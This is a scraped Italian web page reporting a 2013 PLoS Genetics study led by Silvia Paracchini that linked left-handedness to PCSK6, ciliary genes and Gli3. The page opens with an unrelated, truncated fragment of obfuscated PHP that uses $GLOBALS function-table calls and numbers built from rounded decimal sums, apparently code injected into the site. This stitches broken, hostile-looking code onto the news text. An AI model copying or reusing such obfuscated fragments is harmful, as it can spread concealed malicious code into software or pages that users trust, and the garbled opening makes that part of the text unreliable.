=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Mano destra o mano sinistra? Dipende dai geni

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Mano destra o mano sinistra? Dipende dai geni PDF 

Fonte: LeScienze.it (16.09.2013)

 

Il mancinismo è legato a polimorfismi in un ampio gruppo di geni, molti dei quali legati alla definizione dell'asse destra-sinistra nell'embrione fin dalle sue prime fasi di sviluppo. Un altro dei geni coinvolti partecipa invece allo sviluppo del corpo calloso, la struttura che collega gli emisferi cerebrali e sembra essere più grande nei mancini

Una rete di geni che determina il mancinismo di una persona - e più in generale l'asimmetria anatomo-funzionale del corpo - è stata identificata da un gruppo di ricerca delle Università britanniche di Oxford e St. Andrews, che illustra la scoperta in un articolo pubblicato sulla rivista "PLoS Genetics".

Lo studio - diretto dalla ricercatrice italiana Silvia Paracchini, attualmente presso l'Università di St. Andrews – è stato condotto nel quadro di una più ampia ricerca volta a comprendere quali geni potrebbero avere un'influenza sulla spiccata lateralizzazione che caratterizza in modo unico la nostra specie, al fine di ottenere un chiaro quadro delle sue cause e della sua evoluzione.

I ricercatori hanno condotto uno studio di associazione sull'intero genoma analizzando oltre sei milioni polimorfismi a singolo nucleotide (SNP) relativi a un gruppo 3394 persone. Dall'analisi dei risultati è apparso che non esiste un unico gene correlato al mancinismo, ma una molteplicità di geni.

La più forte associazione con il mancinismo riscontrata da Paracchini e colleghi è stata comunque quella con una variante nel gene PCSK6, che è coinvolto nella determinazione delle differenze fra destra e sinistra nell'embrione fin dalle prime fasi di sviluppo. Alcune alterazioni di questo gene, sperimentate sul topo, determinano infatti un posizionamento anomalo degli organi interni, portando per esempio allo sviluppo del cuore e dello stomaco a destra e del fegato a sinistra.

Un'associazione significativa è peraltro apparsa anche con altri geni, molti dei quali finora non erano stati correlati ai meccanismi di posizionamento corretto degli organi. Fra questi, vi sono in particolare quattro geni che, come hanno dimostrato esperimenti sul topo, quando vengono disattivati causano patologie legate alle disfunzioni ciliari delle cellule. Le ciglia sono strutture allungate, filiformi, presenti sulla superficie di quasi tutte le cellule che hanno un ruolo importante per la comunicazione delle informazioni dallo spazio esterno all'interno della cellula.

Uno di questi quattro geni, Gli3, partecipa a sua volta allo sviluppo del corpo calloso, il fascio di nervi che collega i due emisferi cerebrali e che alcuni studi indicano essere più grande nei mancini.

In ogni caso, avvertono gli autori, questi risultati non spiegano completamente la significativa variazione nella lateralizzazione della manualità che esiste negli esseri umani. Il mancinismo interessa infatti circa il 10 per cento della popolazione, in cui si può manifestare in modo più o meno marcato, e sul suo sviluppo influiscono verosimilmente anche fattori ambientali e culturali.

 

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito